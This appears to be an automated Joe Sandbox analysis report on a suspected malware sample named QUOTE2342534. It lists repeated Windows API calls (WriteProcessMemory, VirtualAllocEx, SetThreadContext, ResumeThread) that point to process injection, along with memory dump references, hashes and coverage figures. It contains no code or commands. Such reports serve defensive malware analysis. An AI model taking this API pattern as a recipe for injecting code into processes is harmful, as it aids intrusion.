                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D5123B1C00B1DCEDB24CFA9C8447AEBBF5BF48304F20806AD218AB255C7B56945CF91

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00EF59C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: 00f17e8cc13a539c32dd62f51d7d57445d5b0412c26e92b3254b31daa829dc80
                                                                                                                                                                                                                                                • Instruction ID: d0287aeef0ed85d39514de574c33b689fea5fcf2a027de0b8c5cd7ad54b71ce7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00f17e8cc13a539c32dd62f51d7d57445d5b0412c26e92b3254b31daa829dc80
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 544113B1C00B1DCBDB24CFA9C884B9DBBB5BF49304F20816AD508AB255DBB55945CF90

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 089FE748
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                • Opcode ID: bc964ed65baef36023e0396c3c62f8ff7487b059ba7d30391a01077ee4e08115
                                                                                                                                                                                                                                                • Instruction ID: d0b017fcd491415ff99304cb1e40c36a448d03a5a523e08c48f2816759a54544
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc964ed65baef36023e0396c3c62f8ff7487b059ba7d30391a01077ee4e08115
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 712146B59003099FCB10DFA9C985BEEBBF5FF48310F10842AE919A7251C7789941CBA0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 089FE748
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                • Opcode ID: 5c9216101d30e9f31276f3a469c172c46bc180865d5ce2d7b3efe85f1527fb68
                                                                                                                                                                                                                                                • Instruction ID: 8e6eaa3e2f54ac9da2359952ad9c7db2a352220e48db170b2c99df83adf5abde
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c9216101d30e9f31276f3a469c172c46bc180865d5ce2d7b3efe85f1527fb68
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 062136B59003099FCB10DFAAC985BEEBBF5FF48314F10842AE919A7251D7789944CBA0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 089FE59E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 983334009-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 760 89fe7a0-89fe835 ReadProcessMemory 763 89fe83e-89fe86e 760->763 764 89fe837-89fe83d 760->764 764->763
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 089FE828
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 089FE59E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 089FE828
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EFD6A7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EFD6A7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 089FE666
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 089FE4D2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 947044025-0
APIs
• OutputDebugStringW.KERNELBASE(00000000), ref: 089F4128
Memory Dump Source
• Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
Similarity
• API ID: DebugOutputString
• String ID:
• API String ID: 1166629820-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 089FE666
Memory Dump Source
• Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• OutputDebugStringW.KERNELBASE(00000000), ref: 089F4128
Memory Dump Source
• Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
Similarity
• API ID: DebugOutputString
• String ID:
• API String ID: 1166629820-0
APIs
• ResumeThread.KERNELBASE(?), ref: 089FE4D2
Memory Dump Source
• Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• PostMessageW.USER32(?,?,?,?), ref: 0EF41205
Memory Dump Source
• Source File: 00000000.00000002.2158731559.000000000EF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EF40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ef40000_QUOTE2342534.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00EFAF9E
Memory Dump Source
• Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,?,?,?), ref: 0EF41205
Memory Dump Source
• Source File: 00000000.00000002.2158731559.000000000EF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EF40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ef40000_QUOTE2342534.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• CloseHandle.KERNELBASE(00000000), ref: 089F41C7
Memory Dump Source
• Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 089F41C7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140704451.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c5d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140744983.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c6d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140744983.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c6d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140744983.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c6d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140704451.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c5d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140744983.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c6d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3c2a46d593369a9b23a4d4762e80df3818fe454bf05472d848f60a16fad53102
                                                                                                                                                                                                                                                • Instruction ID: 690d2c84b45c937895a74049a8e957e92ca851b6ec5efa05578b311293f88d9f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c2a46d593369a9b23a4d4762e80df3818fe454bf05472d848f60a16fad53102
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31A15D36E102098FCF15DFA4C8405AEB7B2FF84304B1595BAE905BB266DB75E916CB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1c24d1c2ae0eef698f6d49f023d42ecce6951ef277136bdfb45151d6b153a2d7
                                                                                                                                                                                                                                                • Instruction ID: 2ddd5239e2e596ac24187b0d21aefa905df200fb02b72278d916e02fd2627af2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c24d1c2ae0eef698f6d49f023d42ecce6951ef277136bdfb45151d6b153a2d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF718174E016198FCB08DFAAC5849DEFBF2BF88311F14C56AD418AB215D7749946CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:1.3%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.3%
                                                                                                                                                                                                                                                Signature Coverage:3.8%
                                                                                                                                                                                                                                                Total number of Nodes:132
                                                                                                                                                                                                                                                Total number of Limit Nodes:10

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 423 4176e3-41770c call 42f2a3 426 417712-417720 call 42f8a3 423->426 427 41770e-417711 423->427 430 417730-417741 call 42dc23 426->430 431 417722-41772d call 42fb43 426->431 436 417743-417757 LdrLoadDll 430->436 437 41775a-41775d 430->437 431->430 436->437
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417755
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 450 42c4e3-42c51c call 404873 call 42d733 NtClose
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C517
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 00414017
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 0-3753321779

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 00414017
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 00414017
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
